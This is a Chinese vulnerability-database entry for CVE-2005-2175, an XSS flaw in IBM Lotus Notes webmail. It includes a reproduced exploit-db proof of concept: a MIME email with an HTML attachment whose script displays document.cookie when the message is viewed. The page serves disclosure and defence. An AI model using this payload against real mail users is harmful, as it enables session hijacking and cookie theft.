IBM LotusNotes Web界面 弱安全机制漏洞

IBM LotusNotes Web界面 弱安全机制漏洞

漏洞ID 1108917 漏洞类型 未知
发布时间 2005-07-06 更新时间 2005-07-09
图片[1]-IBM LotusNotes Web界面 弱安全机制漏洞-安全小百科CVE编号 CVE-2005-2175
图片[2]-IBM LotusNotes Web界面 弱安全机制漏洞-安全小百科CNNVD-ID CNNVD-200507-078
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25944
https://www.securityfocus.com/bid/89716
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-078
|漏洞详情
LotusNotes是一套群件系统。LotusNotes存在弱安全机制漏洞。LotusNotes的Web界面会自动处理邮件附件中的HTML,而不提示用户将其保存或打开,这使远程攻击者更易于执行基于web的攻击并窃取cookie。
|漏洞EXP
source: http://www.securityfocus.com/bid/14164/info

IBM Lotus Notes email client is prone to an input validation vulnerability. Reports indicate that HTML and JavaScript attached to received email messages is executed automatically when the email message is viewed. Specifically, users accessing standard Notes mail templates through a Web mail client are affected.

This vulnerability may be leveraged by a remote attacker to automatically execute arbitrary script code in the context of a target user. 

Content-Transfer-Encoding: 8bit
Content-Type: multipart/mixed; boundary="0-1940165274-1120658611=:34349"

--0-1940165274-1120658611=:34349
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Id:
Content-Transfer-Encoding: quoted-printable

read it


                 =09
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=20

--0-1940165274-1120658611=:34349
Content-Type: text/html; name="malxxx.html"
Content-Disposition: inline; filename="malxxx.html"
Content-Description: 268262132-malxxx.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
</HEAD>
<BODY>
<SCRIPT>
document.write('The cookie is:<br> ' + document.cookie + '<p>');
</SCRIPT>
 </BODY></HTML>

--0-1940165274-1120658611=:34349--
|受影响的产品
IBM Lotus Notes 0
|参考资料

来源:SECTRACK
名称:1014440
链接:http://securitytracker.com/id?1014440
来源:BUGTRAQ
名称:20050706CrosssitescriptinginLotusNoteswebmail
链接:http://archives.neohapsis.com/archives/bugtraq/2005-07/0075.html

相关推荐: Symantec Java! JustInTime Compiler Command Execution Vulnerability

Symantec Java! JustInTime Compiler Command Execution Vulnerability 漏洞ID 1101266 漏洞类型 Design Error 发布时间 2002-11-21 更新时间 2002-11-21 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享